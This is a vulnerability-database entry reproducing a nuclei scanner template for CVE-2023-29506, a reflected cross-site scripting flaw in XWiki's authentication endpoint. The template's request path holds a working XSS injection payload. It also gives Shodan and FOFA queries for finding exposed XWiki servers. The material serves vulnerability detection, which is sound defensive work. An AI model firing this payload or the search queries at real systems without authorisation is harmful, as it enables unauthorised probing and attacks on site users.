Lucene search
K

XWiki >= 13.10.8 - Cross-Site Scripting

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 25 Views

XWiki >= 13.10.8 - Reflected XSS in Authentication Endpoint

Related
Refs
Code
id: CVE-2023-29506

info:
  name: XWiki >= 13.10.8 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    Reflected XSS vulnerability in XWiki authenticate endpoints allows execution of arbitrary JavaScript.
  impact: |
    Successful exploitation could allow an attacker to execute malicious scripts in the context of the victim's browser.
  remediation: |
    Implement proper input validation and output encoding to prevent XSS attacks in the XWiki application.
  reference:
    - https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-jjm5-5v9v-7hx2
    - https://jira.xwiki.org/browse/XWIKI-20335
    - https://nvd.nist.gov/vuln/detail/CVE-2023-29506
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-29506
    cwe-id: CWE-79
    epss-score: 0.01721
    epss-percentile: 0.74737
    cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    verified: true
    vendor: xwiki
    product: xwiki
    shodan-query: html:"data-xwiki-reference"
    fofa-query: body="data-xwiki-reference"
  tags: cve,cve2023,xwiki,xss,vuln


http:
  - method: GET
    path:
      - "{{BaseURL}}/xwiki/authenticate/wiki/xwiki%22onload=%22alert(document.domain)%22/resetpassword"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'wiki-xwiki"onload="alert(document.domain)"'
          - 'resetPasswordForm'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022002fbeefe5d00930e7b18deb1048a1a95dcbdef30efa60ef2ef381b3e8030e47b0221009bdc520361cea105930a26ca43464e276f34e9d0868419ef7f221653ccb7f54f:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.7Medium risk
Vulners AI Score6.7
CVSS 3.15.4 - 6.1
EPSS0.01721
SSVC
25